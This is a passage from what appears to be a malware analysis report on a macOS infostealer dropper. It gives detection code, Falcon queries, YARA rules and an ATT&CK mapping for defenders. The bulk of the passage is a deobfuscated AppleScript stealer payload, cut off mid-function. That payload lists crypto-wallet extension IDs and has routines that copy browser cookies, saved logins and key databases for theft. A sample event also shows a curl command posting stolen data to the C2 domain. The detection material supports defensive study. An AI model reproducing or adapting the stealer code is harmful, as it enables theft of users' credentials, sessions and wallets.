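    return [(i, h) for i, ev in enumerate(events) if (h := match_behavioural_iocs(ev))]


# Constructed events: one per rule, then two benign ones. "victim" and
# "dropper-binary" are placeholders, not names from the sample.
SAMPLE_EVENTS = [
    ProcessEvent("osascript", "osascript -e '" + "x" * 110_000 + "'", "bash"),
    ProcessEvent("osascript",
                 "osascript -e 'display dialog \"Enter password\" default answer \"\" with hidden answer'",
                 "bash"),
    ProcessEvent("dscl", "dscl . authonly victim hunter2", "osascript"),
    ProcessEvent("curl",
                 'curl -X POST -H "BuildID: 0" -F "file=@/tmp/out.zip" https://mpasvw[.]com/contact',
                 "osascript"),
    ProcessEvent("pkill", "pkill Terminal", "sh"),
    ProcessEvent("bash", "/bin/bash", "dropper-binary"),
    ProcessEvent("curl", "curl -sS https://example.com/ -o /tmp/x", "zsh"),          # benign
    ProcessEvent("osascript", "osascript -e 'display notification \"hi\"'", "Terminal"),  # benign
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].name, hits)
```

The >100KB threshold and the BuildID header are the high-fidelity rules; the bash-parent rule reproduces the logic of the Falcon query further down and will need an allow-list of legitimate automation parents before it is useful on its own.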
CrowdStrike Falcon Queries
-- Dropper execution pattern: binary piping to bash
event_simpleName=ProcessRollup2 AND FileName="bash" AND ParentBaseFileName NOT IN ("Terminal", "iTerm2", "zsh", "login")
-- AppleScript stealer execution
event_simpleName=ProcessRollup2 AND FileName="osascript" AND CommandLine CONTAINS "-e" AND CommandHistory_bytes > 50000
-- Password dialog social engineering
event_simpleName=ProcessRollup2 AND FileName="osascript" AND CommandLine CONTAINS "hidden answer"
-- Keychain access by osascript
event_simpleName=FileOpenInfo AND FileName="login.keychain-db" AND ContextProcessId_decimal IN (SELECT ProcessId FROM ProcessRollup2 WHERE FileName="osascript")
-- Cookie theft
event_simpleName=FileOpenInfo AND FileName="Cookies.binarycookies" AND ContextProcessId_decimal IN (SELECT ProcessId FROM ProcessRollup2 WHERE FileName="osascript")
-- LaunchDaemon persistence (masquerading as Apple)
event_simpleName=FileWriteInfo AND FilePath CONTAINS "LaunchDaemons" AND FileName="com.apple.accountsd.helper.plist"
-- Bot binary install
event_simpleName=FileWriteInfo AND FilePath CONTAINS "Application Support" AND FileName=".service"
-- Password file creation
event_simpleName=FileWriteInfo AND FileName=".auth" AND FilePath CONTAINS "Application Support"
-- C2 communication
event_simpleName=DnsRequest AND DomainName IN ("mpasvw.com", "aforvm.com")
event_simpleName=NetworkConnection AND RemoteIP="92.246.136.14"
-- Data exfiltration via curl
event_simpleName=ProcessRollup2 AND FileName="curl" AND CommandLine CONTAINS "BuildID"
-- Post-execution cleanup
event_simpleName=ProcessRollup2 AND FileName="pkill" AND CommandLine CONTAINS "Terminal"
YARA Rules
rule MacOS_Infostealer_Dropper {
meta:
description = "Detects macOS infostealer dropper with custom hex encoding"
author = "Malware Analysis"
severity = "Critical"
hash = "13185b0ed3b5032ed4c92f73ea100188af73d46e84a0a2b84055e2f2d3e3b6af"
strings:
$hex_table = { FF 0D 03 00 FF 08 0E FF FF 0F 04 FF FF 07 }
$bin_sh = "/bin/sh" ascii
$bin_bash = "/bin/bas" ascii
$import_fork = "_fork" ascii
$import_pipe = "_pipe" ascii
$import_dup2 = "_dup2" ascii
$import_execl = "_execl" ascii
$import_write = "_write" ascii
condition:
uint32(0) == 0xBEBAFECA and // FAT Mach-O
$hex_table and $bin_sh and $bin_bash and
3 of ($import_*)
}
rule MacOS_Infostealer_AppleScript_Payload {
meta:
description = "Detects obfuscated AppleScript infostealer payload pattern"
strings:
$obf1 = "character id ((item" ascii
$obf2 = "mod 9999" ascii
$obf3 = /set hwyksoup\d+ to/ ascii
$cookie = "Cookies.binarycookies" ascii
$notes = "NoteStore.sqlite" ascii
$pkill = "pkill Terminal" ascii
$dialog = "hidden answer" ascii
$dscl = "dscl . authonly" ascii
condition:
4 of them
}
MITRE ATT&CK Mapping
| Technique | ID | Usage |
|---|---|---|
| AppleScript Execution | T1059.002 | Payload delivered via osascript -e |
| Native API | T1106 | fork/pipe/execl for process creation |
| Obfuscated Files or Information | T1027 | 6-layer encryption in dropper + arithmetic string obfuscation in payload |
| Deobfuscate/Decode Files | T1140 | Runtime string construction from integer arrays |
| Credentials from Password Stores: Keychain | T1555.001 | Keychain directory theft |
| Credentials from Password Stores: Browsers | T1555.003 | Chrome/Brave/Edge/Opera/Firefox/Safari credential theft |
| Steal Web Session Cookie | T1539 | Cookies.binarycookies + browser cookie DB theft |
| GUI Input Capture | T1056.002 | Fake macOS password dialog |
| Data from Local System | T1005 | Desktop/Documents file theft by extension |
| Data from Information Repositories | T1213 | Apple Notes extraction |
| Create or Modify System Process: LaunchDaemon | T1543.004 | com.apple.accountsd.helper persistence |
| Masquerading: Match Legitimate Name | T1036.005 | LaunchDaemon mimics Apple's accountsd |
| Archive Collected Data | T1560.001 | zip/ditto staging to /tmp/out.zip |
| Exfiltration Over C2 Channel | T1041 | curl POST to mpasvw[.]com |
| Application Layer Protocol: HTTP | T1071.001 | HTTP POST with custom headers |
| Ingress Tool Transfer | T1105 | Second-stage binary download via curl |
| Indicator Removal: File Deletion | T1070.004 | bzero memory wiping + pkill Terminal |
| Virtualization/Sandbox Evasion | T1497 | Initial check command gates decryption |
Conclusion
This sample represents a well-engineered macOS infostealer dropper with significant investment in anti-analysis:
- Six encryption layers protect the payload from static extraction
- Runtime key derivation from an environment check binds decryption to the target system
- Per-generator unique transformations prevent pattern-based decryption
- Chunked write with memory wiping defeats runtime memory forensics
- 480+ obfuscated strings in the AppleScript payload prevent string-based detection
The payload itself is comprehensive, targeting virtually every valuable data source on macOS: browser credentials, cookies, crypto wallets (~280 extension IDs), Keychain, Apple Notes, documents, and the user's macOS password. The C2 infrastructure uses both a domain (mpasvw[.]com) and a fallback IP (92.246.136[.]14), with the LaunchDaemon persistence masquerading as Apple's accountsd service.
The combination of a compiled ARM64 dropper with an AppleScript payload is notable -- it combines the evasion benefits of native code encryption with the flexibility of AppleScript's access to macOS APIs (Finder, Notes, browser profiles) without requiring entitlements or TCC bypasses for many data sources.
Annexe A: Deobfuscated Infostealer Payload
The full 114KB AppleScript payload with all 530 obfuscated strings decoded inline and all function/variable names replaced with descriptive equivalents.
Full deobfuscated payload (1,363 lines):
osascript -e '
property targetExtensionIds : {"abamjefkidngfegdjbmffdmbgjgpaobf", "abjfbanhppgiflmobebfffbijcfoeiao", "abkahkcbhngaebpcgfmhkoioedceoigp", "abogmiocnneedmmepnohnhlijcjpcifd", "acmacodkjbdgmoleebolmdjonilkdbch", "admmjipmmciaobhojoghlmleefbicajg", "aeachknmefphepccionboohckonoeemg", "aeblfdkhhhdcdjpifhhbdiojplfjncoa", "afbcbjpbpfadlkmhmclhkeeodmamcflc", "aflkmfhebedbjioipglgcbcmnbpgliof", "agoakfejjabomempkjlepdflaleeobhb", "ahidmapichficbkfglbhgmhjcojjmlnm", "aholpfdialjgjfhomihkjbmgjidlcdno", "aiaghdjafpiofpainifbgfgjfpclngoh", "aiifbnbfobpmeekipheeijimdpnlpgpp", "aijcbedoijmgnlmjeegjaglmepbmpkpi", "ajkifnllfhikkjbjopkhmjoieikeihjb", "ajopcimklncnhjednieoejhkffdolemp", "akkmagafhjjjjclaejjomkeccmjhdkpa", "algblmhagnobbnmakepomicmfljlbehg", "amkmjjmmflddogmhpjloimipbofnfjih", "ammjlinfekkoockogfhdkgcohjlbhmff", "anokgmphncpekkhclmingpimjmcooifb", "apnehcjmnengpnmccpaibjmhhoadaico", "bcenedbpaaegpnijoadpdjiachahncdg", "bcopgchhojmggmffilplmbdicgaihlkp", "bdgmdoedahdcjmpmifafdhnffjinddgc", "bedogdpgdnifilpgeianmmdabklhfkcn", "bfnaelmomeimhlpmgjnjophhpkkoljpa", "bfogiafebfohielmmehodmfbbebbbpei", "bgpipimickeadkjlklgciifhnalhdjhe", "bgjogpoidejdemgoochpnkmdjpocgkha", "bhghoamapcdpbohphigoooaddinpkbai", "bhhhlbepdkbapadjdnnojkbgioiodbic", "bifidjkcdpgfnlbcjpdkdcnbiooooblg", "bipdhagncpgaccgdbddmbpcabgjikfkn", "bkgplkpdgidlgmnlhdfakhcjfpfgjjkb", "bkklifkecemccedpkhcebagjpehhabfb", "bmabahhenimmnfijaiccmonalfhpcndh", "bmikpgodpkclnkgmnpphehdgcimmided", "bocpokimicclpaiekenaeelehdjllofo", "bofddndhbegljegmpmnlbhcejofmjgbn", "bopcbmipnjdcdfflfgjdgdjejmgpoaab", "caljgklbbfbcjjanaijlacgncafpegll", "cfbfdhimifdmdehjmkdobpcjfefblkjm", "cflgahhmjlmnjbikhakapcfkpbcmllam", "cgeeodpfagjceefieflmdfphplkenlfk", "chgfefjpcobfbnpmiokfjjaglahmnded", "cihmoadaighcejopammfbmddcmdekcje", "cjmkndjhnagcfbpiemnkdpomccnjblmj", "cjookpbkjnpkmknedggeecikaponcalb", "ckklhkaabbmdjkahiaaplikpdddkenic", "cmndjbecilbocjfkibfbifhngkdmjgog", "cmoakldedjfnjofgbbfenefcagmedlga", 
"cnlhokffphohmfcddnibpohmkdfafdli", "cnmamaachppnkjgnildpdmkaakejnhae", "cnncmdhjacpkmjmkcafchppbnpnhdmon", "copjnifcecdedocejpaapepagaodgpbh", "cphhlgmgameodnhkjdmkpanlelnlohao", "cpmkedoipcpimgecpmgpldfpohjplkpp", "dbgnhckhnppddckangcjbkjnlddbjkna", "dgiehkgfknklegdhekgeabnhgfjhbajd", "dkdedlpgdmmkkfjabffeganieamfklkm", "dlcobpjiigpikoobohmabehhmhfoodbb", "dldjpboieedgcmpkchcjcbijingjcgok", "dmkamcknogkgcdfhhbddcghachkejeap", "dngmlblcodfobpdpecaadgfbcggfjfnm", "dpcklmdombjcplafheapiblogdlgjjlb", "dphoaaiomekdhacmfoblfblmncpnbahm", "eamiofncoknfkefhlkdblngblpffehek", "eajafomhmkipbjmfmhebemolkcicgfmd", "ebfidpplhabeedpnhjnobghokpiioolj", "efbglgofoippbgcjepnhiblaibcnclgk", "egjidjbpglichdcondbcbdnbeeppgdph", "ehgjhhccekdedpbkifaojjaefeohnoea", "ehjiblpccbknkgimiflboggcffmpphhp", "eiaeiblijfjekdanodkjadfinkhbfgcd", "einnioafmpimabjcddiinlhmijaionap", "ejbidfepgijlcgahbmbckmnaljagjoll", "ejjladinnckdgjemekebdpeokbikhfci", "elalghlhoepcjfaedkcmjolahamlnjcp", "ellkdbaphhldpeajbepobaecooaoafpg", "emeeapjkbcbpbpgaagfchmcgglmebnen", "enabgbdfcbaehmbigakijjabdpdnimlg", "eokbbaidfgdndnljmffldfgjklpjkdoi", "eomhlheglneofffmbfjflldlbcnhpkpb", "epapihdplajcdnnkdeiahlgigofloibg", "fccgmnglbhajioalokbcidhcaikhlcpm", "fcckkdbjnoikooededlapcalpionmalo", "fcfcfllfndlomdhbehjjcoimbgofdncg", "fdchdcpieegfofnofhgdombfckhbcokj", "fdcnegogpncmfejlfnffnofpngdiejii", "fdjamakpfbbddfjaooikfcpapjohcfmg", "ffbceckpkpbcmgiaehlloocglmijnpmp", "ffnbelfdoeiohenkjibnmadjiehjhajb", "fghhpjoffbgecjikiipbkpdakfmkbmig", "fhbohimaelbohpjbbldcngcnapndodjp", "fhilaheimglignddkjgofkcbgekhenbh", "fiikommddbeccaoicoejoniammnalkfa", "fijngjgcjhjmmpcmkeiomlglpeiijkld", "fldfpgipfncgndfolcbkdeeknbbbnhcc", "flpiciilemghbmfalicajoolhkkenfel", "fmblappgoiilbgafhjklehhfifbdocee", "fmhmiaejopepamlcjkncpgpdjichnecm", "fnjhmkhhmkbjkkabndcnnogagogbneec", "fopmedgnkfpebgllppeddmmochcookhc", "fpibioaihcagphbidhodidjbnclocgll", "fpkhgmpbidmiogeglndfbkegfdlnajnf", "gadbifgblmedliakbceidegloehmffic", 
"gafhhkghbfjjkeiendhlofajokpaflmk", "gbjepgaebckfidagpfeioimheabiohmg", "gdokollfhmnbfckbobkdbakhilldkhcj", "ghlmndacnhlaekppcllcpcjjjomjkjpg", "ghmbeldphafepmbegfdlkpapadhbakde", "ginchbkmljhldofnbjabmeophlhdldgp", "gjagmgiddbbciopjhllkdnddhcglnemk", "gjkdbeaiifkpoencioahhcilildpjhgh", "gjlmehlldlphhljhpnlddaodbjjcchai", "gjnckgkfmgmibbkoficdidcljeaaaheg", "gkeelndblnomfmjnophbhfhcjbcnemka", "gkodhkbmiflnmkipcmlhhgadebbeijhh", "glmhbknppefdmpemdmjnjlinpbclokhn", "gpnihlnnodeiiaakbikldcihojploeca", "hbbgbephgojikajhfbomhlmmollphcad", "hcjhpkgbmechpabifbggldplacolbkoh", "hdkobeeifhdplocklknbnejdelgagbao", "hdokiejnpimakedhajhdlcegeplioahd", "heamnjbnflcikcggoiplibfommfbkjpj", "hgbeiipamcgbdjhfflifkgehomnmglgk", "hifafgmccdpekplomjjkcfgodnhcellj", "hmeobnfnfcmdkdcmlblgagmfpfboieaf", "hnfanknocfeofbddgcijnmhnfnkdnaad", "hnhobjmcibchnmglfbldbfabcgaknlkj", "hpbgcgmiemanfelegbndmhieiigkackl", "hpclkefagolihohboafpheddmmgdffjm", "ibljocddagjghmlpgihahamcghfggcjc", "ibnejdfjmmkpcnlpebklmnkoeoihofec", "icblpoalghoakidcjiheabnkijnklhhe", "icpikagpkkbldbfjlbefnmmmcohbjije", "idnnbdplmphpflfnlkomgpfbpcgelopg", "idpdilbfamoopcfofbipefhmmnflljfi", "ieldiilncjhfkalnemgjbffmpomcaigi", "ifckdpamphokdglkkdomedpdegcjhjdp", "ifclboecfhkjbpmhgehodcjpciihhmif", "iglbgmakmggfkoidiagnhknlndljlolb", "igkpcodhieompeloncfnbekccinhapdb", "ilhaljfiglknggcoegeknjghdgampffk", "ilolmnhjbbggkmopnemiphomhaojndmb", "imlcamfeniaidioeflifonfjeeppblda", "inlkhilmjmjomfcpdifpfgllhhlpnbej", "iokeahhehimjnekafflcihljlcjccdbe", "jaooiolkmfcmloonphpiiogkfckgciom", "jbkgjmpfammbgejcpedggoefddacbdia", "jblndlipeogpafnldhgmapagcccfchpi", "jbppfhkifinbpinekbahmdomhlaidhfm", "jcacnejopjdphbnjgfaaobbfafkihpep", "jfdlamikmbghhapbgfoogdffldioobgl", "jfmajkmgjpjognffefopllhaijknhnmm", "jgnfghanfbjmimbdmnjfofnbcgpkbegj", "jhfjfclepacoldmjmkmdlmganfaalklb", "jiepnaheligkibgcjgjepjfppgbcghmp", "jiidiaalihmmhddjgbnbgdfflelocpak", "jiiigigdinhhgjflhljdkcelcjfmplnd", "jkjgekcefbkpogohigkgooodolhdgcda", 
"jkoeaghipilijlahjplgbfiocjhldnap", "jnkelfanjkeadonecabehalmbgpfodjm", "jnldfbidonfeldmalbflbmlebbipcnle", "jnlgamecbpmbajjfhmmmlhejkemejdma", "jnmbobjmhlngoefaiojfljckilhhlhcj", "jojhfeoedkpkglbfimdfabpdfjaoolaf", "kamfleanhcmjelnhaeljonilnmjpkcjc", "kbdcddcmgoplfockflacnnefaehaiocb", "keenhcnmdmjjhincpilijphpiohdppno", "kennjipeijpeengjlogfdjkiiadhbmjl", "kfdniefadaanbjodldohaedphafoffoh", "kgdijkcfiglijhaglibaidbipiejjfdp", "kglcipoddmbniebnibibkghfijekllbl", "khhapgacijodhjokkcjmleaempmchlem", "khpkpbbcccdmmclmpigdgddabeilkdpd", "kilnpioakcdndlodeeceffgjdpojajlo", "kjjebdkfeagdoogagbhepmbimaphnfln", "kkilomkmpmkbdnfelcpgckmpcaemjcdh", "kkpllbgjhchghjapjbinnoddmciocphm", "kkpllkodjeloidieedojogacfhpaihoh", "klghhnkeealcohjjanjjdaeeggmfmlpl", "klnaejjgbibmhlephnhpmaofohgkpgkd", "kmcfomidfpdkfieipokbalgegidffkal", "kmhcihpebfmpgmihbkipmjlmmioameka", "kmphdnilpmdejikjdnlbcnmnabepfgkh", "kncchdigobghenbbaddojjnnaogfppfj", "kpfchfdkjhcoekhdldggegebfakaaiog", "kppfdiipphfccemcignhifpjkapfbihd", "lakggbcodlaclcbbbepmkpdhbcomcgkd", "lbjapbcmmceacocpimbpbidpgmlmoaao", "lccbohhgfkdikahanoclbdmaolidjdfl", "lcmncloheoekhbmljjlhdlaobkedjbgd", "ldinpeekobnhjjdofggfgjlcehhmanlj", "lfmmjkfllhmfmkcobchabopkcefjkoip", "lgbjhdkjmpgjgcbcdlhkokkckpjmedgc", "lgmpcpglpngdoalbgeoldeajfclnhafa", "lmkncnlpeipongihbffpljgehamdebgi", "lnnnmfcpbkafcpgdilckhmhbkkbpkmid", "loinekcabhlmhjjbocijdoimmejangoa", "lpfcbjknijpeeillifnkikgncikgfhdo", "lpilbniiabackdjcionkobglmddfbcjo", "mapbhaebnddapnmifbbkgeedkeplgjmf", "mcohilncbfahbmgdjkbpemcciiolgcge", "mdjmfdffdcmnoblignmgpommbefadffd", "mdnaglckomeedfbogeajfajofmfgpoae", "mfgccjchihfkkindfppnaooecgfneiii", "mfhbebgoclkghebffdldpobeajmbecfk", "mgffkfbidihjpoaomajlbgchddlicgpn", "mjgkpalnahacmhkikiommfiomhjipgjn", "mkchoaaiifodcflmbaphdgeidocajadp", "mkpegjkblkkefacfnmkajcjmabijhclg", "mlbnicldlpdimbjdcncnklfempedeipj", "mlhakagmgkmonhdonhkpjeebfphligng", "mmclamjkknobggpiohfneimmnlggagok", "mmhlniccooihdimnnjhamobppdhaolme", 
"mmmjbcfofconkannjonfmjjajpllddbg", "mnfifefkajgofkcjkemidiaecocnkjeh", "modjfdjcodmehnpccdjngmdfajggaoeh", "momakdpclmaphlamgjcndbgfckjfpemp", "naepdomgkenhinolocfifgehidddafch", "nbdhibgjnjpnkajaghbffjbkcgljfgdi", "nbdpmlhambbdkhkmbfpljckjcmgibalo", "nebnhfamliijlghikdgcigoebonmoibm", "nhbicdelgedinnbcidconlnfeionhbml", "nhlnehondigmgckngjomcpcefcdplmgc", "nhnkbkgjikgcigadomkphalanndcapjk", "niiaamnmgebpeejeemoifgdndgeaekhe", "nkbihfbeogaeaoehlefnkodbefgpgknn", "nknhiehlklippafakaeklbeglecifhad", "nlgbhdfgdhgbiamfdfmbikcdghidoadd", "nlgnepoeokdfodgjkjiblkadkjbdfmgd", "nngceckbapebfimnlniiiahkandclblb", "nopnfnlbinpfoihclomelncopjiioain", "nphplpgoakhhjchkkhmiggakijnkhfnd", "oafedfoadhdjjcipmcbecikgokpaphjk", "oboonakemofpalcgghocfoadofidjkkk", "ocjobpilfplciaddcbafabcegbilnbnb", "oiohdnannmknmdlddkdejbmplhbdcbee", "ojbcfhjmpigfobfclfflafhblgemeidi", "ojggmchlghnjlapmfbnjholfjkiidbch", "omaabbefbmiijedngplfjmnooppbclkk", "onhogfjeacnfoofkfgppdlbmlmnplgbn", "ookjlbkiijinhpmnjffcofjonbfbgaoc", "opcgpfmipidbgpenhmajoajpbobppdil", "opfgelmcmbiajamepnmloijbpoleiama", "panpgppehdchfphcigocleabcmcgfoca", "papngmkmknnmfhabbckobgfpihpdgplk", "pcndjhkinnkaohffealmlmhaepkpmgkb", "pdadjkfkgcafgbceimcpbkalnfnepbnk", "pdliaogehgdbhbnmkklieghmmjkpigpa", "penjlddjkjgpnkllboccdgccekpkcbin", "pfccjkejcgoppjnllalolplgogenfojk", "pgiaagfkgcbnmiiolekcfmljdagdhlcm", "phkbamefinggmakgklpkljjmgibohnba", "pmmnimefaichbcnbndcfpaagbepnjaig", "pnlccmojcmeohlpggmfnbbiapkmbliob", "pnndplcbkakcplkjnolgbkdgjikjednm", "pocmplpaccanhmnllbbkpgfliimjljgo", "ppbibelpcjmhbdihakflkdcoccbgbkpo", "ppdadbejkmjnefldpcdjhnkpbjkikoip"}
on decodeSubtract(encodedValues, keyValues)
set decodedStr to ""
set checksum to 0
repeat with idx from 1 to count of encodedValues
set checksum to (checksum + (item idx of encodedValues)) mod 9999
set decodedStr to decodedStr & (character id ((item idx of encodedValues) - (item idx of keyValues)))
set checksum to (checksum * 3) mod 9999
end repeat
return decodedStr
end decodeSubtract
on decodeAdd(encodedValues, keyValues)
set decodedStr to ""
set checksum to 1
repeat with idx from 1 to count of encodedValues
set checksum to (checksum + (item idx of keyValues)) mod 9999
set decodedStr to decodedStr & (character id ((item idx of encodedValues) + (item idx of keyValues)))
set checksum to checksum + 1
end repeat
return decodedStr
end decodeAdd
on decodeSubConst(encodedValues, keyValues, constantOffset)
set decodedStr to ""
set checksum to 0
repeat with idx from 1 to count of encodedValues
set charCode to ((item idx of encodedValues) - constantOffset)
set charCode to charCode - (item idx of keyValues)
set decodedStr to decodedStr & (character id charCode)
set checksum to (checksum + charCode) mod 9999
end repeat
return decodedStr
end decodeSubConst
on mkdirPath(dirPath)
try
set hwyksoup0 to "mkdir -p " -- DECODED
do shell script hwyksoup0 & quoted form of dirPath
end try
end mkdirPath
on readFileContents(filePath)
try
set posixFile to POSIX file filePath
set fileData to read posixFile
return fileData
end try
return ""
end readFileContents
on getFileName(filePath)
try
set wzdiqcfujfk to (reverse of every character of filePath) as string
set dfgvejlqvi to (offset of "/" in wzdiqcfujfk) - 1
set fzrirmuhdgoa to text 1 thru dfgvejlqvi of wzdiqcfujfk
set dqnmwfga to (reverse of every character of fzrirmuhdgoa) as string
return dqnmwfga
end try
return ""
end getFileName
on getParentDir(filePath)
try
set xqcioqahfq to offset of "/" in (reverse of every character of filePath) as string
set parentDir to text 1 thru -(xqcioqahfq + 1) of filePath
return parentDir
end try
return ""
end getParentDir
on writeToFile(fileContent, filePath)
try
set parentDir to getParentDir(filePath)
mkdirPath(parentDir)
set fileHandle to (open for access filePath with write permission)
set eof of fileHandle to 0
write fileContent to fileHandle starting at eof
close access fileHandle
end try
end writeToFile
on copyFile(sourcePath, destPath)
try
set parentDir to getParentDir(destPath)
mkdirPath(parentDir)
set hwyksoup1 to "cp -f " -- DECODED
do shell script hwyksoup1 & quoted form of sourcePath & " " & quoted form of destPath
end try
end copyFile
on isDirectory(dirPath)
try
set hwyksoup2 to "file -b " -- DECODED
set fileType to (do shell script hwyksoup2 & quoted form of dirPath)
set hwyksoup3 to "directory" -- DECODED
if fileType ends with hwyksoup3 then
return true
end if
end try
return false
end isDirectory
on copyDirectoryRecursive(sourcePath, destPath)
try
set hwyksoup4 to ".DS_Store" -- DECODED
set hwyksoup5 to "Partitions" -- DECODED
set hwyksoup6 to "Code Cache" -- DECODED
set hwyksoup7 to "Cache" -- DECODED
set hwyksoup8 to "market-histo" -- DECODED
set hwyksoup9 to "ry-cache.json" -- DECODED
set hwyksoup10 to "journals" -- DECODED
set hwyksoup11 to "Previews" -- DECODED
set hwyksoup12 to "GPUCache" -- DECODED
set hwyksoup13 to "DawnCache" -- DECODED
set hwyksoup14 to "Crashpad" -- DECODED
set hwyksoup15 to "DawnWebGPUCache" -- DECODED
set hwyksoup16 to "DawnGraphiteCache" -- DECODED
set hwyksoup17 to "__update__" -- DECODED
set hwyksoup18 to "tor" -- DECODED
set hwyksoup19 to "dumps" -- DECODED
set hwyksoup20 to "emoji" -- DECODED
set hwyksoup21 to "user_data" -- DECODED
set hwyksoup22 to "user_data#2" -- DECODED
set hwyksoup23 to "user_data#3" -- DECODED
set excludedDirs to {hwyksoup4, hwyksoup5, hwyksoup6, hwyksoup7, (hwyksoup8 & hwyksoup9), hwyksoup10, hwyksoup11, hwyksoup12, hwyksoup13, hwyksoup14, hwyksoup15, hwyksoup16, hwyksoup17, hwyksoup18, hwyksoup19, hwyksoup20, hwyksoup21, hwyksoup22, hwyksoup23}
set folderItems to list folder sourcePath without invisibles
mkdirPath(destPath)
repeat with itemRef in folderItems
set itemName to contents of itemRef
if itemName is not in excludedDirs then
set srcItemPath to sourcePath & "/" & itemName
set dstItemPath to destPath & "/" & itemName
if isDirectory(srcItemPath) then
copyDirectoryRecursive(srcItemPath, dstItemPath)
else
copyFile(srcItemPath, dstItemPath)
end if
end if
end repeat
end try
end copyDirectoryRecursive
on findProfilePath(filePath, thdtdenwziz)
try
set posixFile to POSIX file filePath
set fileData to read posixFile
set jlxaqvczs to offset of thdtdenwziz in fileData
if jlxaqvczs is 0 then
set hwyksoup24 to "not found" -- DECODED
return hwyksoup24
end if
set vqcnnoup to jlxaqvczs + (length of thdtdenwziz)
set bdximdzzxwm to text vqcnnoup thru (vqcnnoup + 55) of fileData
set kqzguojkonwi to offset of "\\" in bdximdzzxwm
if kqzguojkonwi is 0 then
set hwyksoup25 to "not found" -- DECODED
return hwyksoup25
end if
set extractedValue to text vqcnnoup thru (vqcnnoup + kqzguojkonwi - 2) of fileData
return extractedValue
on error
set hwyksoup26 to "not found" -- DECODED
return hwyksoup26
end try
end findProfilePath
on stealFirefoxExtensions(profilePath, stagingDir)
try
set hwyksoup27 to "/storage/default/" -- DECODED
set jzfglxucatcu to profilePath & hwyksoup27
set zjftqoeox to list folder jzfglxucatcu without invisibles
repeat with gtlootfycp in zjftqoeox
set hwyksoup28 to "moz-extension" -- DECODED
if gtlootfycp starts with hwyksoup28 then
set hwyksoup29 to "/idb/" -- DECODED
set extensionDir to jzfglxucatcu & gtlootfycp & hwyksoup29
try
set idbItems to list folder extensionDir without invisibles
repeat with idbItem in idbItems
set hwyksoup30 to ".sqlite" -- DECODED
if idbItem ends with hwyksoup30 then
copyFile(extensionDir & idbItem, stagingDir & "/" & gtlootfycp & "/" & idbItem)
end if
end repeat
end try
end if
end repeat
end try
end stealFirefoxExtensions
on stealFirefoxBrowserData(browserName, iwignsggj, stagingDir, browserFlag)
try
set hwyksoup31 to "/cookies.sqlite" -- DECODED
set hwyksoup32 to "/formhistory.sqlite" -- DECODED
set hwyksoup33 to "/key4.db" -- DECODED
set hwyksoup34 to "/logins.json" -- DECODED
set hwyksoup35 to "/extensions.json" -- DECODED
set browserFiles to {hwyksoup31, hwyksoup32, hwyksoup33, hwyksoup34, hwyksoup35}
set hwyksoup36 to "true" -- DECODED
if browserFlag is equal to hwyksoup36 then
set hwyksoup37 to "/places.sqlite" -- DECODED
set browserFiles to browserFiles & {hwyksoup37}
end if
set profileList to list folder iwignsggj without invisibles
repeat with profileName in profileList
set hwyksoup38 to "ff/" -- DECODED
set browserOutputDir to stagingDir & hwyksoup38 & browserName & "_" & profileName
stealFirefoxExtensions(iwignsggj & profileName, browserOutputDir)
set profilePath to iwignsggj & profileName
repeat with browserFile in browserFiles
copyFile(profilePath & browserFile, browserOutputDir & browserFile)
end repeat
end repeat
end try
end stealFirefoxBrowserData
on hasTargetExtension(sourcePath, targetNames)
try
set folderItems to list folder sourcePath without invisibles
repeat with mpezkjydp in folderItems
repeat with mvldbrvd in targetNames
if (mpezkjydp contains mvldbrvd) then
return true
end if
end repeat
end repeat
end try
return false
end hasTargetExtension
on stealMatchingDirs(sourcePath, stagingDir, targetNames, includeSubdirs)
try
set folderItems to list folder sourcePath without invisibles
repeat with mpezkjydp in folderItems
repeat with mvldbrvd in targetNames
if (mpezkjydp contains mvldbrvd) then
set matchedPath to sourcePath & mpezkjydp
set outputPath to stagingDir & "/" & mvldbrvd
set ydqpsdubv to true
if includeSubdirs then
set hwyksoup39 to "/IndexedDB/" -- DECODED
set outputPath to outputPath & hwyksoup39
end if
if ydqpsdubv then
copyDirectoryRecursive(matchedPath, outputPath)
end if
end if
end repeat
end repeat
end try
end stealMatchingDirs
on stealChromiumBrowserData(stagingDir, browserPaths, browserFlag)
set hwyksoup40 to "/Network/Cookies" -- DECODED
set hwyksoup41 to "/Cookies" -- DECODED
set hwyksoup42 to "/Web Data" -- DECODED
set hwyksoup43 to "/Login Data" -- DECODED
set hwyksoup44 to "/Local" -- DECODED
set hwyksoup45 to " Exten" -- DECODED
set hwyksoup46 to "sion S" -- DECODED
set hwyksoup47 to "etting" -- DECODED
set hwyksoup48 to "s/" -- DECODED
set hwyksoup49 to "/IndexedDB/" -- DECODED
set hwyksoup50 to "/Loca" -- DECODED
set hwyksoup51 to "l Sto" -- DECODED
set hwyksoup52 to "rage/" -- DECODED
set hwyksoup53 to "level" -- DECODED
set hwyksoup54 to "db/" -- DECODED
set browserFiles to {hwyksoup40, hwyksoup41, hwyksoup42, hwyksoup43, (hwyksoup44 & hwyksoup45 & hwyksoup46 & hwyksoup47 & hwyksoup48), hwyksoup49, (hwyksoup50 & hwyksoup51 & hwyksoup52 & hwyksoup53 & hwyksoup54)}
set hwyksoup55 to "true" -- DECODED
if browserFlag is equal to hwyksoup55 then
set hwyksoup56 to "/History" -- DECODED
set browserFiles to browserFiles & {hwyksoup56}
end if
repeat with zctzvrbhtfey in browserPaths
set browserName to item 1 of zctzvrbhtfey
set profileDir to item 2 of zctzvrbhtfey
set hwyksoup57 to "Chromium/" -- DECODED
set bnrjxjahl to stagingDir & hwyksoup57 & browserName & "_"
try
set profileList to list folder profileDir without invisibles
repeat with profileName in profileList
set hwyksoup58 to "Default" -- DECODED
set hwyksoup59 to "Profile" -- DECODED
if ((profileName as string) is equal to hwyksoup58) or ((profileName as string) contains hwyksoup59) then
set foundTargetExt to false
repeat with jrwsevlksd in browserFiles
set sourcePath to (profileDir & profileName & jrwsevlksd)
set rrdkrigk to jrwsevlksd
set hwyksoup60 to "/Network/Cookies" -- DECODED
if ((jrwsevlksd as string) is equal to hwyksoup60) then
set hwyksoup61 to "/Cookies" -- DECODED
set rrdkrigk to hwyksoup61
end if
set hwyksoup62 to "/Local" -- DECODED
set hwyksoup63 to " Exten" -- DECODED
set hwyksoup64 to "sion S" -- DECODED
set hwyksoup65 to "etting" -- DECODED
set hwyksoup66 to "s/" -- DECODED
set hwyksoup67 to "/IndexedDB/" -- DECODED
set hwyksoup68 to "/Local Stor" -- DECODED
